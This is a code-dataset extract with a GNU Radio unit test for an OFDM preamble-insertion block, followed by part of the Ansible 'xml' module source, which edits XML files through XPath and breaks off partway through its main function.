# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
from pprint import pprint
class test_ofdm_insert_preamble (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def helper(self, v0, v1, fft_length, preamble):
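        # Flow graph: the complex payload (src0) is packed into fft_length-wide
        # vectors and fed to input 0 of the insert-preamble block, while the
        # per-symbol flags (src1) go to input 1. Output 0 is flattened back to
        # a sample stream and collected in dst0; the propagated flags end up
        # in dst1.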
tb = self.tb
src0 = gr.vector_source_c(v0)
src1 = gr.vector_source_b(v1)
s2v = gr.stream_to_vector(gr.sizeof_gr_complex, fft_length)
# print "len(v) = %d" % (len(v))
op = gr.ofdm_insert_preamble(fft_length, preamble)
v2s = gr.vector_to_stream(gr.sizeof_gr_complex, fft_length)
dst0 = gr.vector_sink_c()
dst1 = gr.vector_sink_b()
tb.connect(src0, s2v, (op, 0))
tb.connect(src1, (op, 1))
tb.connect((op, 0), v2s, dst0)
tb.connect((op, 1), dst1)
tb.run()
r0 = dst0.data()
r0v = []
for i in range(len(r0)//fft_length):
r0v.append(r0[i*fft_length:(i+1)*fft_length])
r1 = dst1.data()
self.assertEqual(len(r0v), len(r1))
return (r1, r0v)
def check_match(self, actual, expected_list):
        lst = list(expected_list)
        self.assertEqual(actual, lst)
# ----------------------------------------------------------------
def test_000(self):
# no preamble, 1 symbol payloads
preamble = ()
fft_length = 8
npayloads = 8
v = []
p = []
for i in range(npayloads):
t = fft_length*[(i + i*1j)]
p.append(tuple(t))
v += t
p = tuple(p)
r = self.helper(v, npayloads*[1], fft_length, preamble)
# pprint(r)
self.assertEqual(r[0], tuple(npayloads*[1]))
self.check_match(r[1], (p[0],p[1],p[2],p[3],p[4],p[5],p[6],p[7]))
def test_001(self):
# 1 symbol preamble, 1 symbol payloads
preamble = ((100, 101, 102, 103, 104, 105, 106, 107),)
p0 = preamble[0]
fft_length = 8
npayloads = 8
v = []
p = []
for i in range(npayloads):
t = fft_length*[(i + i*1j)]
p.append(tuple(t))
v += t
r = self.helper(v, npayloads*[1], fft_length, preamble)
self.assertEqual(r[0], tuple(npayloads*[1, 0]))
self.check_match(r[1], (p0, p[0],
p0, p[1],
p0, p[2],
p0, p[3],
p0, p[4],
p0, p[5],
p0, p[6],
p0, p[7]))
def test_002(self):
# 2 symbol preamble, 1 symbol payloads
preamble = ((100, 101, 102, 103, 104, 105, 106, 107),
(200, 201, 202, 203, 204, 205, 206, 207))
p0 = preamble[0]
p1 = preamble[1]
fft_length = 8
npayloads = 8
v = []
p = []
for i in range(npayloads):
t = fft_length*[(i + i*1j)]
p.append(tuple(t))
v += t
r = self.helper(v, npayloads*[1], fft_length, preamble)
self.assertEqual(r[0], tuple(npayloads*[1, 0, 0]))
self.check_match(r[1], (p0, p1, p[0],
p0, p1, p[1],
p0, p1, p[2],
p0, p1, p[3],
p0, p1, p[4],
p0, p1, p[5],
p0, p1, p[6],
p0, p1, p[7]))
def xtest_003_preamble(self):
# 2 symbol preamble, 2 symbol payloads
preamble = ((100, 101, 102, 103, 104, 105, 106, 107),
(200, 201, 202, 203, 204, 205, 206, 207))
p0 = preamble[0]
p1 = preamble[1]
fft_length = 8
npayloads = 8
v = []
p = []
for i in range(npayloads * 2):
t = fft_length*[(i + i*1j)]
p.append(tuple(t))
v += t
r = self.helper(v, npayloads*[1, 0], fft_length, preamble)
self.assertEqual(r[0], tuple(npayloads*[1, 0, 0, 0]))
self.check_match(r[1], (p0, p1, p[0], p[1],
p0, p1, p[2], p[3],
p0, p1, p[4], p[5],
p0, p1, p[6], p[7],
p0, p1, p[8], p[9],
p0, p1, p[10], p[11],
p0, p1, p[12], p[13],
p0, p1, p[14], p[15]))
if __name__ == '__main__':
gr_unittest.run(test_ofdm_insert_preamble, "test_ofdm_insert_preamble.xml")
| pgoeser/gnuradio | gnuradio-core/src/python/gnuradio/gr/qa_ofdm_insert_preamble.py | Python | gpl-3.0 | 5,627 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2014, Red Hat, Inc.
# Copyright: (c) 2014, Tim Bielawa <[email protected]>
# Copyright: (c) 2014, Magnus Hedemark <[email protected]>
# Copyright: (c) 2017, Dag Wieers <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: xml
short_description: Manage bits and pieces of XML files or strings
description:
- A CRUD-like interface to managing bits of XML files.
version_added: '2.4'
options:
path:
description:
- Path to the file to operate on.
- This file must exist ahead of time.
- This parameter is required, unless C(xmlstring) is given.
type: path
required: yes
aliases: [ dest, file ]
xmlstring:
description:
- A string containing XML on which to operate.
- This parameter is required, unless C(path) is given.
type: str
required: yes
xpath:
description:
- A valid XPath expression describing the item(s) you want to manipulate.
- Operates on the document root, C(/), by default.
type: str
namespaces:
description:
- The namespace C(prefix:uri) mapping for the XPath expression.
- Needs to be a C(dict), not a C(list) of items.
type: dict
state:
description:
- Set or remove an xpath selection (node(s), attribute(s)).
type: str
choices: [ absent, present ]
default: present
aliases: [ ensure ]
attribute:
description:
- The attribute to select when using parameter C(value).
- This is a string, not prepended with C(@).
type: raw
value:
description:
- Desired state of the selected attribute.
- Either a string, or to unset a value, the Python C(None) keyword (YAML Equivalent, C(null)).
- Elements default to no value (but present).
- Attributes default to an empty string.
type: raw
add_children:
description:
- Add additional child-element(s) to a selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: list
set_children:
description:
- Set the child-element(s) of a selected element for a given C(xpath).
- Removes any existing children.
- Child elements must be specified as in C(add_children).
- This parameter requires C(xpath) to be set.
type: list
count:
description:
- Search for a given C(xpath) and provide the count of any matches.
- This parameter requires C(xpath) to be set.
type: bool
default: no
print_match:
description:
- Search for a given C(xpath) and print out any matches.
- This parameter requires C(xpath) to be set.
type: bool
default: no
pretty_print:
description:
- Pretty print XML output.
type: bool
default: no
content:
description:
- Search for a given C(xpath) and get content.
- This parameter requires C(xpath) to be set.
type: str
choices: [ attribute, text ]
input_type:
description:
- Type of input for C(add_children) and C(set_children).
type: str
choices: [ xml, yaml ]
default: yaml
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
type: bool
default: no
strip_cdata_tags:
description:
- Remove CDATA tags surrounding text values.
- Note that this might break your XML file if text values contain characters that could be interpreted as XML.
type: bool
default: no
version_added: '2.7'
insertbefore:
description:
- Add additional child-element(s) before the first selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: bool
default: no
version_added: '2.8'
insertafter:
description:
- Add additional child-element(s) after the last selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: bool
default: no
version_added: '2.8'
requirements:
- lxml >= 2.3.0
notes:
- Use the C(--check) and C(--diff) options when testing your expressions.
- The diff output is automatically pretty-printed, so may not reflect the actual file content, only the file structure.
- This module does not handle complicated xpath expressions, so limit xpath selectors to simple expressions.
- Beware that in case your XML elements are namespaced, you need to use the C(namespaces) parameter, see the examples.
  - A namespace prefix should be used for all children of an element where a namespace is defined, unless another namespace is defined for them.
seealso:
- name: Xml module development community wiki
description: More information related to the development of this xml module.
link: https://github.com/ansible/community/wiki/Module:-xml
- name: Introduction to XPath
description: A brief tutorial on XPath (w3schools.com).
link: https://www.w3schools.com/xml/xpath_intro.asp
- name: XPath Reference document
description: The reference documentation on XSLT/XPath (developer.mozilla.org).
link: https://developer.mozilla.org/en-US/docs/Web/XPath
author:
- Tim Bielawa (@tbielawa)
- Magnus Hedemark (@magnus919)
- Dag Wieers (@dagwieers)
'''
EXAMPLES = r'''
# Consider the following XML file:
#
# <business type="bar">
# <name>Tasty Beverage Co.</name>
# <beers>
# <beer>Rochefort 10</beer>
# <beer>St. Bernardus Abbot 12</beer>
# <beer>Schlitz</beer>
# </beers>
# <rating subjective="true">10</rating>
# <website>
# <mobilefriendly/>
# <address>http://tastybeverageco.com</address>
# </website>
# </business>
- name: Remove the 'subjective' attribute of the 'rating' element
xml:
path: /foo/bar.xml
xpath: /business/rating/@subjective
state: absent
- name: Set the rating to '11'
xml:
path: /foo/bar.xml
xpath: /business/rating
value: 11
# Retrieve and display the number of nodes
- name: Get count of 'beers' nodes
xml:
path: /foo/bar.xml
xpath: /business/beers/beer
count: yes
register: hits
- debug:
var: hits.count
# Example where parent XML nodes are created automatically
- name: Add a 'phonenumber' element to the 'business' element
xml:
path: /foo/bar.xml
xpath: /business/phonenumber
value: 555-555-1234
- name: Add several more beers to the 'beers' element
xml:
path: /foo/bar.xml
xpath: /business/beers
add_children:
- beer: Old Rasputin
- beer: Old Motor Oil
- beer: Old Curmudgeon
- name: Add several more beers to the 'beers' element and add them before the 'Rochefort 10' element
xml:
path: /foo/bar.xml
xpath: '/business/beers/beer[text()=\"Rochefort 10\"]'
insertbefore: yes
add_children:
- beer: Old Rasputin
- beer: Old Motor Oil
- beer: Old Curmudgeon
# NOTE: The 'state' defaults to 'present' and 'value' defaults to 'null' for elements
- name: Add a 'validxhtml' element to the 'website' element
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
- name: Add an empty 'validatedon' attribute to the 'validxhtml' element
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml/@validatedon
- name: Add or modify an attribute, add element if needed
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
attribute: validatedon
value: 1976-08-05
# How to read an attribute value and access it in Ansible
- name: Read attribute value
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
content: attribute
attribute: validatedon
register: xmlresp
- name: Show attribute value
debug:
var: xmlresp.matches[0].validxhtml.validatedon
- name: Remove all children from the 'website' element (option 1)
xml:
path: /foo/bar.xml
xpath: /business/website/*
state: absent
- name: Remove all children from the 'website' element (option 2)
xml:
path: /foo/bar.xml
xpath: /business/website
children: []
# In case of namespaces, like in the XML below, they have to be explicitly stated.
#
# <foo xmlns="http://x.test" xmlns:attr="http://z.test">
# <bar>
# <baz xmlns="http://y.test" attr:my_namespaced_attribute="true" />
# </bar>
# </foo>
# NOTE: There is the prefix 'x' in front of the 'bar' element, too.
- name: Set namespaced '/x:foo/x:bar/y:baz/@z:my_namespaced_attribute' to 'false'
xml:
path: foo.xml
xpath: /x:foo/x:bar/y:baz
namespaces:
x: http://x.test
y: http://y.test
z: http://z.test
attribute: z:my_namespaced_attribute
value: 'false'
'''
RETURN = r'''
actions:
description: A dictionary with the original xpath, namespaces and state.
type: dict
returned: success
  sample: {xpath: xpath, namespaces: [namespace1, namespace2], state: present}
backup_file:
description: The name of the backup file that was created
type: str
returned: when backup=yes
sample: /path/to/file.xml.1942.2017-08-24@14:16:01~
count:
description: The count of xpath matches.
type: int
returned: when parameter 'count' is set
sample: 2
matches:
description: The xpath matches found.
type: list
returned: when parameter 'print_match' is set
msg:
description: A message related to the performed action(s).
type: str
returned: always
xmlstring:
description: An XML string of the resulting output.
type: str
returned: when parameter 'xmlstring' is set
'''
import copy
import json
import os
import re
import traceback
from distutils.version import LooseVersion
from io import BytesIO
try:
from lxml import etree, objectify
HAS_LXML = True
except ImportError:
HAS_LXML = False
from ansible.module_utils.basic import AnsibleModule, json_dict_bytes_to_unicode
from ansible.module_utils.six import iteritems, string_types
from ansible.module_utils._text import to_bytes, to_native
from ansible.module_utils.common._collections_compat import MutableMapping
_IDENT = r"[a-zA-Z-][a-zA-Z0-9_\-\.]*"
_NSIDENT = _IDENT + "|" + _IDENT + ":" + _IDENT
# Note: we can't reasonably support the 'if you need to put both ' and " in a string, concatenate
# strings wrapped by the other delimiter' XPath trick, especially as simple XPath.
_XPSTR = "('(?:.*)'|\"(?:.*)\")"
_RE_SPLITSIMPLELAST = re.compile("^(.*)/(" + _NSIDENT + ")$")
_RE_SPLITSIMPLELASTEQVALUE = re.compile("^(.*)/(" + _NSIDENT + ")/text\\(\\)=" + _XPSTR + "$")
_RE_SPLITSIMPLEATTRLAST = re.compile("^(.*)/(@(?:" + _NSIDENT + "))$")
_RE_SPLITSIMPLEATTRLASTEQVALUE = re.compile("^(.*)/(@(?:" + _NSIDENT + "))=" + _XPSTR + "$")
_RE_SPLITSUBLAST = re.compile("^(.*)/(" + _NSIDENT + ")\\[(.*)\\]$")
_RE_SPLITONLYEQVALUE = re.compile("^(.*)/text\\(\\)=" + _XPSTR + "$")
def has_changed(doc):
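    # Compare the current tree against the snapshot taken in main() (the
    # module-level orig_doc); both documents are round-tripped through
    # lxml.objectify before serialisation, presumably to normalise away
    # purely cosmetic differences.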
orig_obj = etree.tostring(objectify.fromstring(etree.tostring(orig_doc)))
obj = etree.tostring(objectify.fromstring(etree.tostring(doc)))
return (orig_obj != obj)
def do_print_match(module, tree, xpath, namespaces):
match = tree.xpath(xpath, namespaces=namespaces)
match_xpaths = []
for m in match:
match_xpaths.append(tree.getpath(m))
match_str = json.dumps(match_xpaths)
msg = "selector '%s' match: %s" % (xpath, match_str)
finish(module, tree, xpath, namespaces, changed=False, msg=msg)
def count_nodes(module, tree, xpath, namespaces):
""" Return the count of nodes matching the xpath """
hits = tree.xpath("count(/%s)" % xpath, namespaces=namespaces)
msg = "found %d nodes" % hits
finish(module, tree, xpath, namespaces, changed=False, msg=msg, hitcount=int(hits))
def is_node(tree, xpath, namespaces):
""" Test if a given xpath matches anything and if that match is a node.
For now we just assume you're only searching for one specific thing."""
if xpath_matches(tree, xpath, namespaces):
# OK, it found something
match = tree.xpath(xpath, namespaces=namespaces)
if isinstance(match[0], etree._Element):
return True
return False
def is_attribute(tree, xpath, namespaces):
""" Test if a given xpath matches and that match is an attribute
An xpath attribute search will only match one item"""
if xpath_matches(tree, xpath, namespaces):
match = tree.xpath(xpath, namespaces=namespaces)
if isinstance(match[0], etree._ElementStringResult):
return True
elif isinstance(match[0], etree._ElementUnicodeResult):
return True
return False
def xpath_matches(tree, xpath, namespaces):
""" Test if a node exists """
if tree.xpath(xpath, namespaces=namespaces):
return True
return False
def delete_xpath_target(module, tree, xpath, namespaces):
""" Delete an attribute or element from a tree """
try:
for result in tree.xpath(xpath, namespaces=namespaces):
# Get the xpath for this result
if is_attribute(tree, xpath, namespaces):
# Delete an attribute
parent = result.getparent()
# Pop this attribute match out of the parent
# node's 'attrib' dict by using this match's
# 'attrname' attribute for the key
parent.attrib.pop(result.attrname)
elif is_node(tree, xpath, namespaces):
# Delete an element
result.getparent().remove(result)
else:
raise Exception("Impossible error")
except Exception as e:
module.fail_json(msg="Couldn't delete xpath target: %s (%s)" % (xpath, e))
else:
finish(module, tree, xpath, namespaces, changed=True)
def replace_children_of(children, match):
for element in match.getchildren():
match.remove(element)
match.extend(children)
def set_target_children_inner(module, tree, xpath, namespaces, children, in_type):
matches = tree.xpath(xpath, namespaces=namespaces)
# Create a list of our new children
children = children_to_nodes(module, children, in_type)
children_as_string = [etree.tostring(c) for c in children]
changed = False
# xpaths always return matches as a list, so....
for match in matches:
# Check if elements differ
if len(match.getchildren()) == len(children):
for idx, element in enumerate(match.getchildren()):
if etree.tostring(element) != children_as_string[idx]:
replace_children_of(children, match)
changed = True
break
else:
replace_children_of(children, match)
changed = True
return changed
def set_target_children(module, tree, xpath, namespaces, children, in_type):
changed = set_target_children_inner(module, tree, xpath, namespaces, children, in_type)
# Write it out
finish(module, tree, xpath, namespaces, changed=changed)
def add_target_children(module, tree, xpath, namespaces, children, in_type, insertbefore, insertafter):
if is_node(tree, xpath, namespaces):
new_kids = children_to_nodes(module, children, in_type)
if insertbefore or insertafter:
insert_target_children(tree, xpath, namespaces, new_kids, insertbefore, insertafter)
else:
for node in tree.xpath(xpath, namespaces=namespaces):
node.extend(new_kids)
finish(module, tree, xpath, namespaces, changed=True)
else:
finish(module, tree, xpath, namespaces)
def insert_target_children(tree, xpath, namespaces, children, insertbefore, insertafter):
"""
Insert the given children before or after the given xpath. If insertbefore is True, it is inserted before the
first xpath hit, with insertafter, it is inserted after the last xpath hit.
"""
insert_target = tree.xpath(xpath, namespaces=namespaces)
loc_index = 0 if insertbefore else -1
index_in_parent = insert_target[loc_index].getparent().index(insert_target[loc_index])
parent = insert_target[0].getparent()
if insertafter:
index_in_parent += 1
for child in children:
parent.insert(index_in_parent, child)
index_in_parent += 1
def _extract_xpstr(g):
return g[1:-1]
def split_xpath_last(xpath):
"""split an XPath of the form /foo/bar/baz into /foo/bar and baz"""
xpath = xpath.strip()
m = _RE_SPLITSIMPLELAST.match(xpath)
if m:
# requesting an element to exist
return (m.group(1), [(m.group(2), None)])
m = _RE_SPLITSIMPLELASTEQVALUE.match(xpath)
if m:
# requesting an element to exist with an inner text
return (m.group(1), [(m.group(2), _extract_xpstr(m.group(3)))])
m = _RE_SPLITSIMPLEATTRLAST.match(xpath)
if m:
# requesting an attribute to exist
return (m.group(1), [(m.group(2), None)])
m = _RE_SPLITSIMPLEATTRLASTEQVALUE.match(xpath)
if m:
# requesting an attribute to exist with a value
return (m.group(1), [(m.group(2), _extract_xpstr(m.group(3)))])
m = _RE_SPLITSUBLAST.match(xpath)
if m:
content = [x.strip() for x in m.group(3).split(" and ")]
return (m.group(1), [('/' + m.group(2), content)])
m = _RE_SPLITONLYEQVALUE.match(xpath)
if m:
# requesting a change of inner text
return (m.group(1), [("", _extract_xpstr(m.group(2)))])
return (xpath, [])
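# Illustrative splits produced by the regexes above:
# split_xpath_last("/business/rating") -> ("/business", [("rating", None)])
# split_xpath_last("/business/rating/@subjective='true'")
#     -> ("/business/rating", [("@subjective", "true")])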
def nsnameToClark(name, namespaces):
if ":" in name:
(nsname, rawname) = name.split(":")
# return "{{%s}}%s" % (namespaces[nsname], rawname)
return "{{{0}}}{1}".format(namespaces[nsname], rawname)
# no namespace name here
return name
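# e.g. nsnameToClark("y:baz", {"y": "http://y.test"}) -> "{http://y.test}baz"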
def check_or_make_target(module, tree, xpath, namespaces):
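    # Recursively ensure the target of `xpath` exists: split off the last path
    # step, make sure the parent path exists first, then create whatever the
    # last step describes (an element, an attribute or a text value). Returns
    # True if the tree was modified.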
(inner_xpath, changes) = split_xpath_last(xpath)
if (inner_xpath == xpath) or (changes is None):
module.fail_json(msg="Can't process Xpath %s in order to spawn nodes! tree is %s" %
(xpath, etree.tostring(tree, pretty_print=True)))
return False
changed = False
if not is_node(tree, inner_xpath, namespaces):
changed = check_or_make_target(module, tree, inner_xpath, namespaces)
# we test again after calling check_or_make_target
if is_node(tree, inner_xpath, namespaces) and changes:
for (eoa, eoa_value) in changes:
if eoa and eoa[0] != '@' and eoa[0] != '/':
# implicitly creating an element
new_kids = children_to_nodes(module, [nsnameToClark(eoa, namespaces)], "yaml")
if eoa_value:
for nk in new_kids:
nk.text = eoa_value
for node in tree.xpath(inner_xpath, namespaces=namespaces):
node.extend(new_kids)
changed = True
# module.fail_json(msg="now tree=%s" % etree.tostring(tree, pretty_print=True))
elif eoa and eoa[0] == '/':
element = eoa[1:]
new_kids = children_to_nodes(module, [nsnameToClark(element, namespaces)], "yaml")
for node in tree.xpath(inner_xpath, namespaces=namespaces):
node.extend(new_kids)
for nk in new_kids:
for subexpr in eoa_value:
# module.fail_json(msg="element=%s subexpr=%s node=%s now tree=%s" %
# (element, subexpr, etree.tostring(node, pretty_print=True), etree.tostring(tree, pretty_print=True))
check_or_make_target(module, nk, "./" + subexpr, namespaces)
changed = True
# module.fail_json(msg="now tree=%s" % etree.tostring(tree, pretty_print=True))
elif eoa == "":
for node in tree.xpath(inner_xpath, namespaces=namespaces):
if (node.text != eoa_value):
node.text = eoa_value
changed = True
elif eoa and eoa[0] == '@':
attribute = nsnameToClark(eoa[1:], namespaces)
for element in tree.xpath(inner_xpath, namespaces=namespaces):
changing = (attribute not in element.attrib or element.attrib[attribute] != eoa_value)
if changing:
changed = changed or changing
if eoa_value is None:
value = ""
else:
value = eoa_value
element.attrib[attribute] = value
# module.fail_json(msg="arf %s changing=%s as curval=%s changed tree=%s" %
# (xpath, changing, etree.tostring(tree, changing, element[attribute], pretty_print=True)))
else:
module.fail_json(msg="unknown tree transformation=%s" % etree.tostring(tree, pretty_print=True))
return changed
def ensure_xpath_exists(module, tree, xpath, namespaces):
changed = False
if not is_node(tree, xpath, namespaces):
changed = check_or_make_target(module, tree, xpath, namespaces)
finish(module, tree, xpath, namespaces, changed)
def set_target_inner(module, tree, xpath, namespaces, attribute, value):
changed = False
try:
if not is_node(tree, xpath, namespaces):
changed = check_or_make_target(module, tree, xpath, namespaces)
except Exception as e:
missing_namespace = ""
        # NOTE: This checks only the namespaces defined in the root element!
        # TODO: Implement a more robust check for the existence of child namespaces
if tree.getroot().nsmap and ":" not in xpath:
missing_namespace = "XML document has namespace(s) defined, but no namespace prefix(es) used in xpath!\n"
module.fail_json(msg="%sXpath %s causes a failure: %s\n -- tree is %s" %
(missing_namespace, xpath, e, etree.tostring(tree, pretty_print=True)), exception=traceback.format_exc())
if not is_node(tree, xpath, namespaces):
module.fail_json(msg="Xpath %s does not reference a node! tree is %s" %
(xpath, etree.tostring(tree, pretty_print=True)))
for element in tree.xpath(xpath, namespaces=namespaces):
if not attribute:
changed = changed or (element.text != value)
if element.text != value:
element.text = value
else:
changed = changed or (element.get(attribute) != value)
if ":" in attribute:
attr_ns, attr_name = attribute.split(":")
# attribute = "{{%s}}%s" % (namespaces[attr_ns], attr_name)
attribute = "{{{0}}}{1}".format(namespaces[attr_ns], attr_name)
if element.get(attribute) != value:
element.set(attribute, value)
return changed
def set_target(module, tree, xpath, namespaces, attribute, value):
changed = set_target_inner(module, tree, xpath, namespaces, attribute, value)
finish(module, tree, xpath, namespaces, changed)
def get_element_text(module, tree, xpath, namespaces):
if not is_node(tree, xpath, namespaces):
module.fail_json(msg="Xpath %s does not reference a node!" % xpath)
elements = []
for element in tree.xpath(xpath, namespaces=namespaces):
elements.append({element.tag: element.text})
finish(module, tree, xpath, namespaces, changed=False, msg=len(elements), hitcount=len(elements), matches=elements)
def get_element_attr(module, tree, xpath, namespaces):
if not is_node(tree, xpath, namespaces):
module.fail_json(msg="Xpath %s does not reference a node!" % xpath)
elements = []
for element in tree.xpath(xpath, namespaces=namespaces):
child = {}
for key in element.keys():
value = element.get(key)
child.update({key: value})
elements.append({element.tag: child})
finish(module, tree, xpath, namespaces, changed=False, msg=len(elements), hitcount=len(elements), matches=elements)
def child_to_element(module, child, in_type):
if in_type == 'xml':
infile = BytesIO(to_bytes(child, errors='surrogate_or_strict'))
try:
parser = etree.XMLParser()
node = etree.parse(infile, parser)
return node.getroot()
except etree.XMLSyntaxError as e:
module.fail_json(msg="Error while parsing child element: %s" % e)
elif in_type == 'yaml':
if isinstance(child, string_types):
return etree.Element(child)
elif isinstance(child, MutableMapping):
if len(child) > 1:
module.fail_json(msg="Can only create children from hashes with one key")
(key, value) = next(iteritems(child))
if isinstance(value, MutableMapping):
children = value.pop('_', None)
node = etree.Element(key, value)
if children is not None:
if not isinstance(children, list):
module.fail_json(msg="Invalid children type: %s, must be list." % type(children))
subnodes = children_to_nodes(module, children)
node.extend(subnodes)
else:
node = etree.Element(key)
node.text = value
return node
else:
module.fail_json(msg="Invalid child type: %s. Children must be either strings or hashes." % type(child))
else:
module.fail_json(msg="Invalid child input type: %s. Type must be either xml or yaml." % in_type)
def children_to_nodes(module=None, children=None, type='yaml'):
"""turn a str/hash/list of str&hash into a list of elements"""
children = [] if children is None else children
return [child_to_element(module, child, type) for child in children]
def make_pretty(module, tree):
xml_string = etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
result = dict(
changed=False,
)
if module.params['path']:
xml_file = module.params['path']
with open(xml_file, 'rb') as xml_content:
if xml_string != xml_content.read():
result['changed'] = True
if not module.check_mode:
if module.params['backup']:
result['backup_file'] = module.backup_local(module.params['path'])
tree.write(xml_file, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
elif module.params['xmlstring']:
result['xmlstring'] = xml_string
# NOTE: Modifying a string is not considered a change !
if xml_string != module.params['xmlstring']:
result['changed'] = True
module.exit_json(**result)
def finish(module, tree, xpath, namespaces, changed=False, msg='', hitcount=0, matches=tuple()):
result = dict(
actions=dict(
xpath=xpath,
namespaces=namespaces,
state=module.params['state']
),
changed=has_changed(tree),
)
if module.params['count'] or hitcount:
result['count'] = hitcount
if module.params['print_match'] or matches:
result['matches'] = matches
if msg:
result['msg'] = msg
if result['changed']:
if module._diff:
result['diff'] = dict(
before=etree.tostring(orig_doc, xml_declaration=True, encoding='UTF-8', pretty_print=True),
after=etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=True),
)
if module.params['path'] and not module.check_mode:
if module.params['backup']:
result['backup_file'] = module.backup_local(module.params['path'])
tree.write(module.params['path'], xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
if module.params['xmlstring']:
result['xmlstring'] = etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
module.exit_json(**result)
def main():
module = AnsibleModule(
argument_spec=dict(
path=dict(type='path', aliases=['dest', 'file']),
xmlstring=dict(type='str'),
xpath=dict(type='str'),
namespaces=dict(type='dict', default={}),
state=dict(type='str', default='present', choices=['absent', 'present'], aliases=['ensure']),
value=dict(type='raw'),
attribute=dict(type='raw'),
add_children=dict(type='list'),
set_children=dict(type='list'),
count=dict(type='bool', default=False),
print_match=dict(type='bool', default=False),
pretty_print=dict(type='bool', default=False),
content=dict(type='str', choices=['attribute', 'text']),
input_type=dict(type='str', default='yaml', choices=['xml', 'yaml']),
backup=dict(type='bool', default=False),
strip_cdata_tags=dict(type='bool', default=False),
insertbefore=dict(type='bool', default=False),
insertafter=dict(type='bool', default=False),
),
supports_check_mode=True,
# TODO: Implement this as soon as #28662 (required_by functionality) is merged
# required_by=dict(
# add_children=['xpath'],
# attribute=['value'],
# set_children=['xpath'],
# value=['xpath'],
# ),
required_if=[
['content', 'attribute', ['xpath']],
['content', 'text', ['xpath']],
['count', True, ['xpath']],
['print_match', True, ['xpath']],
['insertbefore', True, ['xpath']],
['insertafter', True, ['xpath']],
],
required_one_of=[
['path', 'xmlstring'],
['add_children', 'content', 'count', 'pretty_print', 'print_match', 'set_children', 'value'],
],
mutually_exclusive=[
['add_children', 'content', 'count', 'print_match', 'set_children', 'value'],
['path', 'xmlstring'],
['insertbefore', 'insertafter'],
],
)
xml_file = module.params['path']
xml_string = module.params['xmlstring']
xpath = module.params['xpath']
namespaces = module.params['namespaces']
state = module.params['state']
value = json_dict_bytes_to_unicode(module.params['value'])
attribute = module.params['attribute']
set_children = json_dict_bytes_to_unicode(module.params['set_children'])
add_children = json_dict_bytes_to_unicode(module.params['add_children'])
pretty_print = module.params['pretty_print']
content = module.params['content']
input_type = module.params['input_type']
print_match = module.params['print_match']
count = module.params['count']
backup = module.params['backup']
strip_cdata_tags = module.params['strip_cdata_tags']
insertbefore = module.params['insertbefore']
insertafter = module.params['insertafter']
# Check if we have lxml 2.3.0 or newer installed
if not HAS_LXML:
module.fail_json(msg='The xml ansible module requires the lxml python library installed on the managed machine')
elif LooseVersion('.'.join(to_native(f) for f in etree.LXML_VERSION)) < LooseVersion('2.3.0'):
module.fail_json(msg='The xml ansible module requires lxml 2.3.0 or newer installed on the managed machine')
elif LooseVersion('.'.join(to_native(f) for f in etree.LXML_VERSION)) < LooseVersion('3.0.0'):
module.warn('Using lxml version lower than 3.0.0 does not guarantee predictable element attribute order.')
# Check if the file exists
if xml_string:
infile = BytesIO(to_bytes(xml_string, errors='surrogate_or_strict'))
elif os.path.isfile(xml_file):
infile = open(xml_file, 'rb')
else:
module.fail_json(msg="The target XML source '%s' does not exist." % xml_file)
# Parse and evaluate xpath expression
if xpath is not None:
try:
etree.XPath(xpath)
except etree.XPathSyntaxError as e:
module.fail_json(msg="Syntax error in xpath expression: %s (%s)" % (xpath, e))
except etree.XPathEvalError as e:
module.fail_json(msg="Evaluation error in xpath expression: %s (%s)" % (xpath, e))
# Try to parse in the target XML file
try:
parser = etree.XMLParser(remove_blank_text=pretty_print, strip_cdata=strip_cdata_tags)
doc = etree.parse(infile, parser)
except etree.XMLSyntaxError as e:
module.fail_json(msg="Error while parsing document: %s (%s)" % (xml_file or 'xml_string', e))
# Ensure we have the original copy to compare
global orig_doc
orig_doc = copy.deepcopy(doc)
if print_match:
do_print_match(module, doc, xpath, namespaces)
if count:
count_nodes(module, doc, xpath, namespaces)
if content == 'attribute':
get_element_attr(module, doc, xpath, namespaces)
elif content == 'text':
get_element_text(module, doc, xpath, namespaces)
# File exists:
if state == 'absent':
# - absent: delete xpath target
delete_xpath_target(module, doc, xpath, namespaces)
# - present: carry on
# children && value both set?: should have already aborted by now
# add_children && set_children both set?: should have already aborted by now
# set_children set?
if set_children:
set_target_children(module, doc, xpath, namespaces, set_children, input_type)
# add_children set?
if add_children:
add_target_children(module, doc, xpath, namespaces, add_children, input_type, insertbefore, insertafter)
# No?: Carry on
# Is the xpath target an attribute selector?
if value is not None:
